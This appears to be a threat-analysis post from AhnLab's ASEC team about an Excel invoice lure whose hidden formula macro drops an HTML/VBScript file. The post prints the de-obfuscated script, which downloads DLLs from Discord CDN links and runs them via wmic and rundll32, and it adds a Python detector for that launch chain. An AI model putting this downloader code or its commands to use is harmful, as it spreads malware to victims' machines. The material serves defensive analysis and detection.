Malicious Excel File Disguised as an Invoice, Possibly Targeting Companies

The ASEC analysis team has recently discovered a malicious Excel file disguised as an invoice. The file is being distributed as an e-mail attachment with a filename of the form Invoice-[number]_date.xlsb. The following is the malicious e-mail being distributed in Korea.

Figure 1. E-mail

When the Excel file is opened, editing is restricted and the user is prompted to click the image inside the file (see the figure below).

Figure 2. Excel file

Because the macro is assigned to this image, the macro runs and performs its malicious behavior only when the user clicks the image. The Macro1 sheet is hidden, and the macro's formulas are split across many different cells within that sheet (see Figure 4).

Figure 3. Macro assigned to the image

Figure 4. Hidden sheet

When the user clicks the image, the message shown in the figure below appears. The malicious behavior is triggered when the user clicks either the OK button or the Close button.

Figure 5. Pop-up error message

The executed macro creates the file excel.rtf in the %APPDATA%\Microsoft\Excel\XLSTART folder and runs it with the command wmic process call create ‘mshta %APPDATA%\Microsoft\Excel\XLSTART\excel.rtf’.

Figure 6. Created excel.rtf file

Despite its extension, excel.rtf is an HTML file padded with many inserted comments, which hide a malicious VBScript in a form that users cannot easily recognize. The following is the script from the de-obfuscated excel.rtf file.

<!DOCTYPE html>
<html>
<head>
---omitted---
<script type="text/vbscript" LANGUAGE="VBScript" >
Set hRpLar = CreateObject("Wscript.Shell") 
fpCHuctA = Replace(hRpLar.expandenvironmentstrings("%LOGONSERVER%"), CHR(92), "") 
RBfOKtU = hRpLar.expandenvironmentstrings("%USERDOMAIN%") 
If LCase(fpCHuctA) <> LCase(RBfOKtU) Then 

For Each WvpdWK in Array("https://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll")  
    Set UWXaoFp = CreateObject("Scripting.FileSystemObject")
    If Not UWXaoFp.FileExists("C:\\ProgramData\spprgrss.png") Then
---omitted---
         with FiTmVH 
            .type = 1
            .open
            .write djGHweg.responseBody 
            .savetofile "C:\\ProgramData\spprgrss.png", 2 
            .close  
        end with 
        With CreateObject("Wscript.Shell") 
            .Exec("wmic process call create " & Chr(34) & "rundll32.exe C:\\ProgramData\spprgrss.png BrandMe" & Chr(34))
        End With
---omitted---

The script contains code that compares the values of the %LOGONSERVER% and %USERDOMAIN% environment variables. For ordinary (non-domain) users these two values are the same (on a standalone machine both resolve to the local computer name), so the download does not start. It thus appears that the malware targets users in an Active Directory (AD) environment.

If the values of %LOGONSERVER% and %USERDOMAIN% differ, an additional malicious file is downloaded. The downloaded file is saved as spprgrss.png in the ProgramData folder and is executed with the command wmic process call create “rundll32.exe C:\\ProgramData\spprgrss.png BrandMe”; the .png extension is only a disguise, since rundll32 loads the file as a DLL and calls its BrandMe export.
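The execution chain described above (Excel → wmic → mshta on a non-.hta file, then wmic → rundll32 on a non-.dll module) is what a defender can look for in process-creation telemetry. The following Python detector is an added example, not code from the post or from AhnLab; the event field names, the sample paths and the two benign events are constructed assumptions.

```python
import re

# Constructed sample process-creation events (hypothetical field names, not a
# real log format). Paths follow the chain described in the post; the last two
# events are benign and check that ordinary rundll32/wmic use is not flagged.
# Processes started via "wmic process call create" appear under WmiPrvSE.exe.
SAMPLE_EVENTS = [
    {"parent": "EXCEL.EXE", "image": "wmic.exe",
     "cmdline": r"wmic process call create 'mshta C:\Users\u\AppData\Roaming\Microsoft\Excel\XLSTART\excel.rtf'"},
    {"parent": "WmiPrvSE.exe", "image": "mshta.exe",
     "cmdline": r"mshta C:\Users\u\AppData\Roaming\Microsoft\Excel\XLSTART\excel.rtf"},
    {"parent": "mshta.exe", "image": "wmic.exe",
     "cmdline": r'wmic process call create "rundll32.exe C:\ProgramData\spprgrss.png BrandMe"'},
    {"parent": "WmiPrvSE.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\spprgrss.png BrandMe"},
    {"parent": "explorer.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"parent": "cmd.exe", "image": "wmic.exe", "cmdline": "wmic os get caption"},
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
WMIC_CREATE = re.compile(r"process\s+call\s+create", re.I)
LOLBIN_IN_CMD = re.compile(r"\b(mshta|rundll32)(\.exe)?\b", re.I)
# First path argument after mshta / rundll32, quoted or bare (rundll32 stops at the comma).
MSHTA_TARGET = re.compile(r"mshta(?:\.exe)?\s+['\"]?([^'\"\s]+)", re.I)
RUNDLL_MODULE = re.compile(r"rundll32(?:\.exe)?\s+['\"]?([^'\",\s]+)", re.I)

def classify(event):
    """Return the names of the detection rules that match one event."""
    hits = []
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    if image == "wmic.exe" and WMIC_CREATE.search(cmd):
        if parent in OFFICE:           # an Office app launching wmic to spawn a process
            hits.append("office_spawns_wmic_process_create")
        if LOLBIN_IN_CMD.search(cmd):  # wmic used to proxy mshta / rundll32
            hits.append("wmic_create_lolbin")
    if image == "mshta.exe":
        m = MSHTA_TARGET.search(cmd)
        if m and not m.group(1).lower().endswith((".hta", ".htm", ".html")):
            hits.append("mshta_non_hta_target")     # excel.rtf is really HTML + VBScript
    if image == "rundll32.exe":
        m = RUNDLL_MODULE.search(cmd)
        if m and not m.group(1).lower().endswith(".dll"):
            hits.append("rundll32_non_dll_module")  # spprgrss.png is a DLL in disguise
    return hits

def scan(events):
    """Return (event index, rule name) pairs for every match in a list of events."""
    return [(i, h) for i, e in enumerate(events) for h in classify(e)]
```

Running scan(SAMPLE_EVENTS) flags the four malicious events and neither benign one; in a real deployment the same rules would be applied to Sysmon Event ID 1 or EDR process-creation records.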

The following are download URLs that exist in the script.

  • hxxps://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll
  • hxxps://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll
  • hxxps://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll

Because the URLs above are no longer active, the additional files could not be downloaded. However, they are presumed to be banking malware such as Dridex.

In addition to Excel files containing VBA macros, Excel files that use formula macros like this one continue to be discovered. As always, users must refrain from opening e-mail attachments from unknown senders, and should take care not to allow a macro included in a file to execute.

AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.

[File Detection]

  • Downloader/XLS.Generic

[IOC]

  • 8b645dcfa487c9146a9c5b08aeeeb230

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
